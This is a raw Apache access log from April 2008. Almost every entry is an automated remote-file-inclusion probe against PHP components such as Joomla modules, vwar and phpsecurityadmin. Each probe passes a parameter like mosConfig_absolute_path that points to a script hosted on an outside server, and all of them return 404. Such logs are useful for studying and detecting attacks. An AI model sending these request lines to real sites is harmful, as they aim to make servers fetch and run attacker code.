62.141.56.36 - - [27/Apr/2008:18:20:44 -0600] "GET /logs/access_log.20080413//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://modelroom.com/cache/idnews.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.65"
62.141.56.36 - - [27/Apr/2008:18:20:44 -0600] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://modelroom.com/cache/idnews.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.65"
62.141.56.36 - - [27/Apr/2008:18:20:44 -0600] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://modelroom.com/cache/idnews.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.65"
200.30.73.117 - - [27/Apr/2008:18:20:48 -0600] "GET /logs/access_log//vwar//includes/functions_install.php?vwar_root=http://h1.ripway.com/sun/modul/idd.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.803"
200.30.73.117 - - [27/Apr/2008:18:20:48 -0600] "GET //vwar//includes/functions_install.php?vwar_root=http://h1.ripway.com/sun/modul/idd.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.803"
200.30.73.117 - - [27/Apr/2008:18:20:48 -0600] "GET /logs//vwar//includes/functions_install.php?vwar_root=http://h1.ripway.com/sun/modul/idd.txt??? HTTP/1.1" 404 248 "-" "libwww-perl/5.803"
83.223.101.14 - - [27/Apr/2008:18:21:07 -0600] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 273 "-" "Avant Browser (http://www.avantbrowser.com)"
83.223.101.14 - - [27/Apr/2008:18:21:07 -0600] "GET /logs/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 278 "-" "Avant Browser (http://www.avantbrowser.com)"
62.141.56.36 - - [27/Apr/2008:18:21:11 -0600] "GET /logs/access_log.20080413//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://modelroom.com/cache/idnews.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.65"
62.141.56.36 - - [27/Apr/2008:18:21:12 -0600] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://modelroom.com/cache/idnews.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.65"
62.141.56.36 - - [27/Apr/2008:18:21:12 -0600] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://modelroom.com/cache/idnews.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.65"
87.230.21.32 - - [27/Apr/2008:18:22:24 -0600] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
87.230.21.32 - - [27/Apr/2008:18:22:27 -0600] "GET /logs/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 278 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
87.243.128.10 - - [27/Apr/2008:18:23:42 -0600] "GET /logs/access_log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
87.243.128.10 - - [27/Apr/2008:18:23:42 -0600] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
87.243.128.10 - - [27/Apr/2008:18:23:42 -0600] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
62.141.56.36 - - [27/Apr/2008:18:23:46 -0600] "GET /logs/access_log.20080413//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://modelroom.com/cache/idnews.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.65"
62.141.56.36 - - [27/Apr/2008:18:23:47 -0600] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://modelroom.com/cache/idnews.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.65"
62.141.56.36 - - [27/Apr/2008:18:23:47 -0600] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://modelroom.com/cache/idnews.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.65"
70.86.49.98 - - [27/Apr/2008:18:25:20 -0600] "GET /logs/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 278 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
70.86.49.98 - - [27/Apr/2008:18:25:21 -0600] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
72.232.122.239 - - [27/Apr/2008:18:25:33 -0600] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 273 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
72.232.122.239 - - [27/Apr/2008:18:25:33 -0600] "GET /logs/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 278 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
62.141.56.36 - - [27/Apr/2008:18:26:00 -0600] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://modelroom.com/cache/idnews.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.65"
62.141.56.36 - - [27/Apr/2008:18:26:47 -0600] "GET /logs/access_log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://modelroom.com/cache/idnews.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.65"
62.141.56.36 - - [27/Apr/2008:18:26:53 -0600] "GET /logs/error_log.20080406//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://modelroom.com/cache/idnews.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.65"
213.194.149.65 - - [27/Apr/2008:18:27:53 -0600] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.centrogassystem.com/includes/ids.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.811"
72.232.122.239 - - [27/Apr/2008:18:28:34 -0600] "GET /logs/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 278 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
72.232.122.239 - - [27/Apr/2008:18:28:35 -0600] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 273 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
83.223.101.14 - - [27/Apr/2008:18:29:44 -0600] "GET /logs/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 278 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
83.223.101.14 - - [27/Apr/2008:18:29:45 -0600] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
87.243.128.10 - - [27/Apr/2008:18:29:53 -0600] "GET /logs/error_log.20080330//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
65.36.177.149 - - [27/Apr/2008:18:29:56 -0600] "GET /logs/access_log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 279 "-" "libwww-perl/5.65"
190.54.49.157 - - [27/Apr/2008:18:30:28 -0600] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://rehab.ru/administrator/templates/id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
190.54.49.157 - - [27/Apr/2008:18:30:28 -0600] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://rehab.ru/administrator/templates/id.txt?? HTTP/1.1" 404 266 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
72.232.122.239 - - [27/Apr/2008:18:30:30 -0600] "GET /logs/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 278 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
72.232.122.239 - - [27/Apr/2008:18:30:31 -0600] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 273 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
64.179.90.54 - - [27/Apr/2008:18:31:27 -0600] "GET /logs/access_log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.65"
64.179.90.54 - - [27/Apr/2008:18:31:28 -0600] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 228 "-" "libwww-perl/5.65"
64.179.90.54 - - [27/Apr/2008:18:31:29 -0600] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.65"
83.223.101.14 - - [27/Apr/2008:18:32:14 -0600] "GET /logs/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 278 "-" "Avant Browser (http://www.avantbrowser.com)"
83.223.101.14 - - [27/Apr/2008:18:32:16 -0600] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 273 "-" "Avant Browser (http://www.avantbrowser.com)"
70.86.49.98 - - [27/Apr/2008:18:33:01 -0600] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 273 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
70.86.49.98 - - [27/Apr/2008:18:33:01 -0600] "GET /logs/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 278 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
87.229.26.205 - - [27/Apr/2008:18:33:03 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.freewebtown.com/amir5/idat.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
87.229.26.205 - - [27/Apr/2008:18:33:03 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.freewebtown.com/amir5/idat.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
213.194.149.65 - - [27/Apr/2008:18:33:23 -0600] "GET /logs/access_log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.centrogassystem.com/includes/ids.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.811"
213.194.149.65 - - [27/Apr/2008:18:33:23 -0600] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.centrogassystem.com/includes/ids.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.811"
213.194.149.65 - - [27/Apr/2008:18:33:24 -0600] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.centrogassystem.com/includes/ids.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.811"
213.215.228.13 - - [27/Apr/2008:18:33:37 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.freewebtown.com/amir5/idat.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
213.215.228.13 - - [27/Apr/2008:18:33:37 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.freewebtown.com/amir5/idat.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
200.182.225.143 - - [27/Apr/2008:18:34:12 -0600] "GET /logs/index.php?go1=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
200.182.225.143 - - [27/Apr/2008:18:34:14 -0600] "GET /index.php?go1=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
89.108.66.127 - - [27/Apr/2008:18:36:01 -0600] "GET /logs/access_log.20080413//guestbook//admin.php?include_path=http://h1.ripway.com/cyber1212/plugin/id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
89.108.66.127 - - [27/Apr/2008:18:36:01 -0600] "GET //guestbook//admin.php?include_path=http://h1.ripway.com/cyber1212/plugin/id.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
89.108.66.127 - - [27/Apr/2008:18:36:02 -0600] "GET /logs//guestbook//admin.php?include_path=http://h1.ripway.com/cyber1212/plugin/id.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
87.243.128.10 - - [27/Apr/2008:18:36:45 -0600] "GET /logs/access_log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
87.243.128.10 - - [27/Apr/2008:18:36:45 -0600] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
87.243.128.10 - - [27/Apr/2008:18:36:45 -0600] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
208.80.193.47 - - [27/Apr/2008:18:36:48 -0600] "GET / HTTP/1.1" 200 698 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312466)"
87.243.128.10 - - [27/Apr/2008:18:37:18 -0600] "GET /logs/access_log.20080413//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
213.194.149.65 - - [27/Apr/2008:18:37:51 -0600] "GET /logs/access_log.20080413//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.centrogassystem.com/includes/ids.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.811"
200.21.85.101 - - [27/Apr/2008:18:37:53 -0600] "GET /logs/error_log.20080406/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
89.108.66.127 - - [27/Apr/2008:18:37:54 -0600] "GET /logs//guestbook//admin.php?include_path=http://h1.ripway.com/cyber1212/plugin/id.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
89.108.66.127 - - [27/Apr/2008:18:37:54 -0600] "GET //guestbook//admin.php?include_path=http://h1.ripway.com/cyber1212/plugin/id.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
200.21.85.101 - - [27/Apr/2008:18:37:54 -0600] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
200.21.85.101 - - [27/Apr/2008:18:37:56 -0600] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
87.243.128.10 - - [27/Apr/2008:18:38:34 -0600] "GET /logs/error_log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
87.243.128.10 - - [27/Apr/2008:18:38:34 -0600] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
87.243.128.10 - - [27/Apr/2008:18:38:34 -0600] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
203.116.91.54 - - [27/Apr/2008:18:38:39 -0600] "GET /logs/access_log//vwar//includes/functions_install.php?vwar_root=http://h1.ripway.com/sun/modul/idd.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
203.116.91.54 - - [27/Apr/2008:18:38:39 -0600] "GET //vwar//includes/functions_install.php?vwar_root=http://h1.ripway.com/sun/modul/idd.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
203.116.91.54 - - [27/Apr/2008:18:38:40 -0600] "GET /logs//vwar//includes/functions_install.php?vwar_root=http://h1.ripway.com/sun/modul/idd.txt??? HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
87.243.128.10 - - [27/Apr/2008:18:38:49 -0600] "GET /logs/access_log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
200.160.251.134 - - [27/Apr/2008:18:39:08 -0600] "GET /logs/error_log.20080406/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
200.160.251.134 - - [27/Apr/2008:18:39:11 -0600] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
83.223.101.14 - - [27/Apr/2008:18:39:12 -0600] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
83.223.101.14 - - [27/Apr/2008:18:39:12 -0600] "GET /logs/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 278 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
200.160.251.134 - - [27/Apr/2008:18:39:17 -0600] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
200.216.238.230 - - [27/Apr/2008:18:39:37 -0600] "GET /logs/access_log//modules/xfsection/modify.php?dir_module=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
200.216.238.230 - - [27/Apr/2008:18:39:37 -0600] "GET /logs/access_log//modules/xfsection/modify.php?dir_module=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
200.216.238.230 - - [27/Apr/2008:18:39:40 -0600] "GET //modules/xfsection/modify.php?dir_module=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
200.216.238.230 - - [27/Apr/2008:18:39:40 -0600] "GET //modules/xfsection/modify.php?dir_module=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
200.216.238.230 - - [27/Apr/2008:18:39:43 -0600] "GET /logs//modules/xfsection/modify.php?dir_module=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
200.216.238.230 - - [27/Apr/2008:18:39:44 -0600] "GET /logs//modules/xfsection/modify.php?dir_module=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
200.1.202.61 - - [27/Apr/2008:18:39:58 -0600] "GET /logs/error_log.20080406//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 279 "-" "libwww-perl/5.79"
200.1.202.61 - - [27/Apr/2008:18:39:58 -0600] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 255 "-" "libwww-perl/5.79"
200.1.202.61 - - [27/Apr/2008:18:39:59 -0600] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 260 "-" "libwww-perl/5.79"
200.1.202.61 - - [27/Apr/2008:18:40:44 -0600] "GET /logs/access_log.20080406//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 280 "-" "libwww-perl/5.79"
64.179.90.54 - - [27/Apr/2008:18:41:03 -0600] "GET /logs/error_log.20080330//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 240 "-" "libwww-perl/5.65"
81.174.65.190 - - [27/Apr/2008:18:41:23 -0600] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.walex.ch/templates/madeyourweb/.../www?? HTTP/1.1" 404 265 "-" "libwww-perl/5.811"
81.174.65.190 - - [27/Apr/2008:18:41:23 -0600] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.walex.ch/templates/madeyourweb/.../www?? HTTP/1.1" 404 260 "-" "libwww-perl/5.811"
70.86.49.98 - - [27/Apr/2008:18:41:25 -0600] "GET //index.php?page=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 228 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
87.230.21.32 - - [27/Apr/2008:18:41:28 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.freewebtown.com/amir5/idat.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
70.86.49.98 - - [27/Apr/2008:18:41:29 -0600] "GET /logs//index.php?page=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 233 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
87.230.21.32 - - [27/Apr/2008:18:41:32 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 242 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
87.230.21.32 - - [27/Apr/2008:18:41:34 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.freewebtown.com/amir5/idat.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
87.230.21.32 - - [27/Apr/2008:18:41:45 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 247 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
87.229.26.205 - - [27/Apr/2008:18:41:58 -0600] "GET /logs//index.php?page=http://www.freewebtown.com/amir5/idat.txt? HTTP/1.1" 404 233 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
87.229.26.205 - - [27/Apr/2008:18:41:58 -0600] "GET //index.php?page=http://www.freewebtown.com/amir5/idat.txt? HTTP/1.1" 404 228 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
87.230.21.32 - - [27/Apr/2008:18:42:11 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
87.230.21.32 - - [27/Apr/2008:18:42:16 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
85.17.1.143 - - [27/Apr/2008:18:42:39 -0600] "GET /logs/error_log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.studio-wave.com/concept/images/css.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.810"
85.17.1.143 - - [27/Apr/2008:18:42:39 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.studio-wave.com/concept/images/css.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.810"
85.17.1.143 - - [27/Apr/2008:18:42:39 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.studio-wave.com/concept/images/css.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.810"
85.17.1.143 - - [27/Apr/2008:18:42:46 -0600] "GET /logs/access_log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.studio-wave.com/concept/images/css.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.810"
64.57.64.147 - - [27/Apr/2008:18:43:12 -0600] "GET /logs/access_log/oneadmin/config.php?path[docroot]=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
